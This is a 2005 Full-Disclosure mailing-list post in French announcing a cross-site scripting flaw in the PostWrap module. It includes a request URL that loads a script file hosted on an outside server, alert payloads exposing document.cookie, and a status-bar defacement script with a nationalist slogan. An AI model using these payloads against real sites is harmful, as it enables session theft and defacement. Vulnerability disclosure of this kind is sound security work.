[Full-Disclosure] XSS VULNERABILITY AT MODULE PostWrap

Tue, 08 Feb 2005 08:28:52 -0800

Bonjour, Albania Security Clan vient de d�couvrir une vulnebalirit� de type XSS dans le module PostWrap le problem est au niveu de /index.php?module=PostWrap&page=http://hostename.com/HACK/asc/ascmd.txt c n'est po une php injection parce que c'est prot�g� mais on peux injecter des comandes XSS, du _javascript_ regardez plutot:
ceci est un exemple de code qu'on peux injecter,
<script>alert("COOKIE and HOSTNAME")</script>
<script>alert(document.cookie)</script>
<script>alert(document.hostname)</script>
<script>alert("Long LIVE Ethnic ALBANIA")</script>
<SCRIPT language=_javascript_>
<!--
/* status */
  function one()
    {window.status = ".-*'^'*-.,_,.-*'^'*-[   -  -  -  -  -  - ]=[> ALBANIA SECURITY CLAN XXS VULNERABILITY AT MODULE PostWrap <]=[   -  -  -  -  -  - ]-*'^'*-.,_,.-*'^'*-.  ";
    setTimeout("two()",60);
    }
  function two()
    {window.status = ".-*'^'*-.,_,.-*'^'*-[  -  -  -  -  -  -  ]=[> ALBANIA SECURITY CLAN XXS VULNERABILITY AT MODULE PostWrap <]=[  -  -  -  -  -  -  ]-*'^'*-.,_,.-*'^'*-.  ";
    setTimeout("three()",120);
    }
  function three()
    {window.status = ".-*'^'*-.,_,.-*'^'*-[ -  -  -  -  -  -   ]=[> ALBANIA SECURITY CLAN XSS VULNERABILITY AT MODULE PostWrap <]=[ -  -  -  -  -  -   ]-*'^'*-.,_,.-*'^'*-.  ";
    setTimeout("one()",180);
    }
  one();
// -->
</SCRIPT>
puis vous mettez ce code source dans un fichier .txt et vous l'uploader sur un site web (server) pour povoire l'injecter.
Meilleurs Salutations d'Albanie.
www.albanianhaxorz.org | irc.gigachat.net #ASC

MSN Actions Solidaires : partez comme volontaire � l'�tranger 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Reply via email to